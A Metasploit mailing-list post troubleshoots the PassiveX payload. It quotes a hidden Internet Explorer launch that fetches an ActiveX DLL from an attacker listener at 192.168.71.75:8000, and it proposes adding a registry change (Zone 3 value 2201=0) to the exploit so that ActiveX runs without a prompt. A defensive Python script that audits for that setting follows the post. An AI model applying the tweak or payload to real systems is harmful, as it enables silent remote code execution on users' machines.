Metasploit mailing list archives

Using the PassiveX payload


From: featuremeister at googlemail.com (Feature Meister)
Date: Fri, 5 May 2006 18:18:44 +0200

Hi,

The DLL does not get downloaded into %WINDIR%\Downloaded Program Files.
After some more troubleshooting and debugging (with Process Explorer)
I found out that the hidden IE is started with "...\iexplore.exe -new
http://192.168.71.75:8000/".
So I tried this one from a regular command line.
Result: IE prevented an ActiveX Control from being loaded and executed
automatically. Instead I was presented with a pop-up and the usual IE
information bar.
I then looked at the security settings of Internet-Zone. Besides
"Automatic prompting for ActiveX controls" everything was set so that
the control would execute without asking.
However the above setting was set to "Disable". I changed it to
"Enable" according to the helpful help dialog ;-) and tried it again:
it works!
The required setting in
HKCU\Software\Microsoft\Windows\CurrentVersion\Internet
Settings\Zones\3 would be:

"2201"=dword:00000000

Probably this could be added to the actual exploit code?

Cheers,

Marco
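
A defender-side check for the setting described in the message above, as an added example that is not part of the original post or of Metasploit: it parses a text registry export and lists every key ending in the Zones\3 path where 2201 is 0. The sample export, the function names and the use of Python are assumptions made for this illustration.

```python
import re

# Key path named in the post (zone 3), without the hive prefix.
ZONE3_KEY = r"Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3"
ACTION = "2201"  # "Automatic prompting for ActiveX controls", per the post

# Constructed sample of a text registry export (not taken from a real host).
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2]
"2201"=dword:00000003

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3]
"CurrentLevel"=dword:00011000
"2201"=dword:00000000
"DisplayName"="Internet"
'''

SECTION = re.compile(r"^\[(-?)(.+)\]$")
DWORD = re.compile(r'^"([^"]+)"=dword:([0-9a-fA-F]{1,8})$')


def parse_dwords(reg_text):
    """Return {key_path: {value_name: int}} for every dword in a .reg export."""
    keys, current = {}, None
    for raw in reg_text.splitlines():
        line = raw.strip()
        section = SECTION.match(line)
        if section:
            # "[-KEY]" is a deletion directive and carries no values.
            current = None if section.group(1) else section.group(2)
            if current is not None:
                keys.setdefault(current, {})
            continue
        dword = DWORD.match(line)
        if dword and current is not None:
            keys[current][dword.group(1)] = int(dword.group(2), 16)
    return keys


def audit_zone3(reg_text):
    """List keys ending in the Zones\\3 path where action 2201 is 0."""
    suffix = "\\" + ZONE3_KEY.lower()
    return [key for key, values in parse_dwords(reg_text).items()
            if key.lower().endswith(suffix) and values.get(ACTION) == 0]


if __name__ == "__main__":
    for key in audit_zone3(SAMPLE_REG):
        print(f"{key}: {ACTION}=0, the value the post reports as 'Enable'")
```

Exports written by regedit are UTF-16, so decode the file accordingly before passing its text to `audit_zone3`.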

